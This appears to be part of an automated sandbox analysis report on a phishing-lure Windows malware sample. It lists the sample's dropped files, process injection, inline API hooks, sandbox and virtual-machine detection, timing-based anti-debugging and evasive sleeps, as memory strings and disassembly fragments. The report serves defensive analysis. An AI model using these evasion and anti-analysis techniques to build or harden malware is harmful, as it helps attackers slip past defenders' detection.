Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe Code function: 9_2_0040B550 push eax; ret 9_2_0040B58C
Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe Code function: 9_2_0040B50D push ecx; ret 9_2_0040B51D
Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe Code function: 13_2_0040B550 push eax; ret 13_2_0040B564
Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe Code function: 13_2_0040B550 push eax; ret 13_2_0040B58C
Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe Code function: 13_2_0040B50D push ecx; ret 13_2_0040B51D
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_0041C023 push eax; ret 24_2_0041C029
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_0041D0F2 push eax; ret 24_2_0041D0F8
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_0041D0FB push eax; ret 24_2_0041D162
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_0041D0A5 push eax; ret 24_2_0041D0F8
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_0041D15C push eax; ret 24_2_0041D162
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_00416A81 pushfd ; ret 24_2_00416A8C
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_0040B28C pushad ; ret 24_2_0040B28D
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_0041CFA2 push edx; iretd 24_2_0041CFAC
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_0078A5EC push es; ret 24_2_0078A71A
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_0124D0D1 push ecx; ret 24_2_0124D0E4
Source: C:\Windows\explorer.exe Code function: 25_2_061CB947 pushfd ; retf 25_2_061CB945
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D1D0D1 push ecx; ret 32_2_04D1D0E4
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_02B1B28C pushad ; ret 32_2_02B1B28D
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_02B2DA2D push cs; iretd 32_2_02B2DA2E
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_02B2D0A5 push eax; ret 32_2_02B2D0F8
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_02B2D0F2 push eax; ret 32_2_02B2D0F8
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_02B2D0FB push eax; ret 32_2_02B2D162
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_02B2C023 push eax; ret 32_2_02B2C029
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_02B2D9C9 push ecx; retf 32_2_02B2D9CA
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_02B2D15C push eax; ret 32_2_02B2D162
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_02B2CFA2 push edx; iretd 32_2_02B2CFAC
Source: initial sample Static PE information: section name: .text entropy: 7.9825675946

Persistence and Installation Behavior:

Creates processes with suspicious names
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe File created: \require your sales ledger from 01-april-2020.exe
Drops PE files
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe File created: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe File created: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe
Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe Code function: 9_2_00401306 OpenServiceW,CloseServiceHandle,QueryServiceStatus,StartServiceW,CloseServiceHandle,CloseServiceHandle, 9_2_00401306

Hooking and other Techniques for Hiding and Protection:

Modifies the prolog of user mode functions (user mode inline hooks)
Source: explorer.exe User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8C 0xCE 0xEE
Extensive use of GetProcAddress (often used to hide API calls)
Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe Code function: 9_2_00408E31 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 9_2_00408E31
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmmon32.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000002.314738221.0000000002951000.00000004.00000001.sdmp Binary or memory string: SBIEDLL.DLLDSELECT * FROM WIN32_COMPUTERSYSTEM
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe RDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe RDTSC instruction interceptor: First address: 0000000000409B5E second address: 0000000000409B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\cmmon32.exe RDTSC instruction interceptor: First address: 0000000002B198E4 second address: 0000000002B198EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\cmmon32.exe RDTSC instruction interceptor: First address: 0000000002B19B5E second address: 0000000002B19B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Contains capabilities to detect virtual machines
Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_00409A90 rdtsc 24_2_00409A90
Contains long sleeps (>= 3 min)
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4734
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2204
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe TID: 5512 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6320 Thread sleep count: 4734 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6320 Thread sleep count: 2204 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2596 Thread sleep count: 51 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6920 Thread sleep time: -922337203685477s >= -30000s
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\explorer.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\cmmon32.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: powershell.exe, 00000016.00000003.399487030.000000000599A000.00000004.00000001.sdmp Binary or memory string: Hyper-V
Source: explorer.exe, 00000019.00000000.348253683.000000000871F000.00000004.00000001.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: explorer.exe, 00000019.00000000.348253683.000000000871F000.00000004.00000001.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000:
Source: explorer.exe, 00000019.00000000.346788619.0000000008220000.00000002.00000001.sdmp Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: explorer.exe, 00000019.00000000.347525561.0000000008640000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: Require your Sales Ledger from 01-April-2020.exe, 00000000.00000002.314738221.0000000002951000.00000004.00000001.sdmp Binary or memory string: vmware
Source: explorer.exe, 00000019.00000000.335019320.00000000055D0000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}V*(E
Source: explorer.exe, 00000019.00000000.348253683.000000000871F000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}~
Source: explorer.exe, 00000019.00000000.348253683.000000000871F000.00000004.00000001.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
Source: explorer.exe, 00000019.00000000.348546302.00000000087D1000.00000004.00000001.sdmp Binary or memory string: VMware SATA CD00ices
Source: explorer.exe, 00000019.00000000.335150903.0000000005603000.00000004.00000001.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
Source: explorer.exe, 00000019.00000000.349143933.00000000088C3000.00000004.00000001.sdmp Binary or memory string: en_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000019.00000000.346788619.0000000008220000.00000002.00000001.sdmp Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: explorer.exe, 00000019.00000000.346788619.0000000008220000.00000002.00000001.sdmp Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: AdvancedRun.exe, 00000009.00000002.283016558.0000000000757000.00000004.00000020.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: powershell.exe, 00000016.00000003.399487030.000000000599A000.00000004.00000001.sdmp Binary or memory string: l:C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V
Source: explorer.exe, 00000019.00000000.346788619.0000000008220000.00000002.00000001.sdmp Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Process information queried: ProcessInformation

Anti Debugging:

Checks if the current process is being debugged
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Process queried: DebugPort
Source: C:\Windows\SysWOW64\cmmon32.exe Process queried: DebugPort
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_00409A90 rdtsc 24_2_00409A90
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_0040ACD0 LdrLoadDll, 24_2_0040ACD0
Contains functionality to dynamically determine API calls
Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe Code function: 9_2_0040289F LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 9_2_0040289F
Contains functionality to read the PEB
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_01214120 mov eax, dword ptr fs:[00000030h] 24_2_01214120
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_01214120 mov ecx, dword ptr fs:[00000030h] 24_2_01214120
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_0122513A mov eax, dword ptr fs:[00000030h] 24_2_0122513A
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_011F9100 mov eax, dword ptr fs:[00000030h] 24_2_011F9100
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_0121B944 mov eax, dword ptr fs:[00000030h] 24_2_0121B944
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_011FB171 mov eax, dword ptr fs:[00000030h] 24_2_011FB171
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_011FB171 mov eax, dword ptr fs:[00000030h] 24_2_011FB171
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_011FC962 mov eax, dword ptr fs:[00000030h] 24_2_011FC962
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_012769A6 mov eax, dword ptr fs:[00000030h] 24_2_012769A6
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_012261A0 mov eax, dword ptr fs:[00000030h] 24_2_012261A0
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_012261A0 mov eax, dword ptr fs:[00000030h] 24_2_012261A0
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_012B49A4 mov eax, dword ptr fs:[00000030h] 24_2_012B49A4
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_012B49A4 mov eax, dword ptr fs:[00000030h] 24_2_012B49A4
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_012B49A4 mov eax, dword ptr fs:[00000030h] 24_2_012B49A4
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_012B49A4 mov eax, dword ptr fs:[00000030h] 24_2_012B49A4
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_012751BE mov eax, dword ptr fs:[00000030h] 24_2_012751BE
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_012751BE mov eax, dword ptr fs:[00000030h] 24_2_012751BE
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_012751BE mov eax, dword ptr fs:[00000030h] 24_2_012751BE
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_012751BE mov eax, dword ptr fs:[00000030h] 24_2_012751BE
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_0121C182 mov eax, dword ptr fs:[00000030h] 24_2_0121C182
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_0122A185 mov eax, dword ptr fs:[00000030h] 24_2_0122A185
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_01222990 mov eax, dword ptr fs:[00000030h] 24_2_01222990
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_012841E8 mov eax, dword ptr fs:[00000030h] 24_2_012841E8
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_011FB1E1 mov eax, dword ptr fs:[00000030h] 24_2_011FB1E1
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_011FB1E1 mov eax, dword ptr fs:[00000030h] 24_2_011FB1E1
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_011FB1E1 mov eax, dword ptr fs:[00000030h] 24_2_011FB1E1
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_0120B02A mov eax, dword ptr fs:[00000030h] 24_2_0120B02A
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_0120B02A mov eax, dword ptr fs:[00000030h] 24_2_0120B02A
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_0120B02A mov eax, dword ptr fs:[00000030h] 24_2_0120B02A
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_0120B02A mov eax, dword ptr fs:[00000030h] 24_2_0120B02A
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_0122002D mov eax, dword ptr fs:[00000030h] 24_2_0122002D
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_0122002D mov eax, dword ptr fs:[00000030h] 24_2_0122002D
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_0122002D mov eax, dword ptr fs:[00000030h] 24_2_0122002D
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_0122002D mov eax, dword ptr fs:[00000030h] 24_2_0122002D
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_0122002D mov eax, dword ptr fs:[00000030h] 24_2_0122002D
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_01277016 mov eax, dword ptr fs:[00000030h] 24_2_01277016
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_01277016 mov eax, dword ptr fs:[00000030h] 24_2_01277016
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_01277016 mov eax, dword ptr fs:[00000030h] 24_2_01277016
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_012C4015 mov eax, dword ptr fs:[00000030h] 24_2_012C4015
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_012C4015 mov eax, dword ptr fs:[00000030h] 24_2_012C4015
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_012B2073 mov eax, dword ptr fs:[00000030h] 24_2_012B2073
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_012C1074 mov eax, dword ptr fs:[00000030h] 24_2_012C1074
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_01210050 mov eax, dword ptr fs:[00000030h] 24_2_01210050
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_01210050 mov eax, dword ptr fs:[00000030h] 24_2_01210050
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_012220A0 mov eax, dword ptr fs:[00000030h] 24_2_012220A0
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_012220A0 mov eax, dword ptr fs:[00000030h] 24_2_012220A0
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_012220A0 mov eax, dword ptr fs:[00000030h] 24_2_012220A0
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_012220A0 mov eax, dword ptr fs:[00000030h] 24_2_012220A0
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_012220A0 mov eax, dword ptr fs:[00000030h] 24_2_012220A0
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_012220A0 mov eax, dword ptr fs:[00000030h] 24_2_012220A0
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_012390AF mov eax, dword ptr fs:[00000030h] 24_2_012390AF
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_0122F0BF mov ecx, dword ptr fs:[00000030h] 24_2_0122F0BF
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_0122F0BF mov eax, dword ptr fs:[00000030h] 24_2_0122F0BF
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_0122F0BF mov eax, dword ptr fs:[00000030h] 24_2_0122F0BF
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_011F9080 mov eax, dword ptr fs:[00000030h] 24_2_011F9080
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_01273884 mov eax, dword ptr fs:[00000030h] 24_2_01273884
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_01273884 mov eax, dword ptr fs:[00000030h] 24_2_01273884
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_011F58EC mov eax, dword ptr fs:[00000030h] 24_2_011F58EC
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_0128B8D0 mov eax, dword ptr fs:[00000030h] 24_2_0128B8D0
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_0128B8D0 mov ecx, dword ptr fs:[00000030h] 24_2_0128B8D0
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_0128B8D0 mov eax, dword ptr fs:[00000030h] 24_2_0128B8D0
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_0128B8D0 mov eax, dword ptr fs:[00000030h] 24_2_0128B8D0
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_0128B8D0 mov eax, dword ptr fs:[00000030h] 24_2_0128B8D0
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_0128B8D0 mov eax, dword ptr fs:[00000030h] 24_2_0128B8D0
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_011F40E1 mov eax, dword ptr fs:[00000030h] 24_2_011F40E1
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_011F40E1 mov eax, dword ptr fs:[00000030h] 24_2_011F40E1
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_011F40E1 mov eax, dword ptr fs:[00000030h] 24_2_011F40E1
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_012B131B mov eax, dword ptr fs:[00000030h] 24_2_012B131B
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_011FF358 mov eax, dword ptr fs:[00000030h] 24_2_011FF358
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_01223B7A mov eax, dword ptr fs:[00000030h] 24_2_01223B7A
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_01223B7A mov eax, dword ptr fs:[00000030h] 24_2_01223B7A
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_011FDB40 mov eax, dword ptr fs:[00000030h] 24_2_011FDB40
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_012C8B58 mov eax, dword ptr fs:[00000030h] 24_2_012C8B58
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_011FDB60 mov ecx, dword ptr fs:[00000030h] 24_2_011FDB60
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_012C5BA5 mov eax, dword ptr fs:[00000030h] 24_2_012C5BA5
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_01224BAD mov eax, dword ptr fs:[00000030h] 24_2_01224BAD
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_01224BAD mov eax, dword ptr fs:[00000030h] 24_2_01224BAD
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_01224BAD mov eax, dword ptr fs:[00000030h] 24_2_01224BAD
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_012B138A mov eax, dword ptr fs:[00000030h] 24_2_012B138A
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_012AD380 mov ecx, dword ptr fs:[00000030h] 24_2_012AD380
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_01201B8F mov eax, dword ptr fs:[00000030h] 24_2_01201B8F
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_01201B8F mov eax, dword ptr fs:[00000030h] 24_2_01201B8F
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_0122B390 mov eax, dword ptr fs:[00000030h] 24_2_0122B390
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_01222397 mov eax, dword ptr fs:[00000030h] 24_2_01222397
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_012203E2 mov eax, dword ptr fs:[00000030h] 24_2_012203E2
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_012203E2 mov eax, dword ptr fs:[00000030h] 24_2_012203E2
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_012203E2 mov eax, dword ptr fs:[00000030h] 24_2_012203E2
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_012203E2 mov eax, dword ptr fs:[00000030h] 24_2_012203E2
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_012203E2 mov eax, dword ptr fs:[00000030h] 24_2_012203E2
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_012203E2 mov eax, dword ptr fs:[00000030h] 24_2_012203E2
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_0121DBE9 mov eax, dword ptr fs:[00000030h] 24_2_0121DBE9
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_012753CA mov eax, dword ptr fs:[00000030h] 24_2_012753CA
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_012753CA mov eax, dword ptr fs:[00000030h] 24_2_012753CA
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Code function: 24_2_0121A229 mov eax, dword ptr fs:[00000030h] 24_2_0121A229
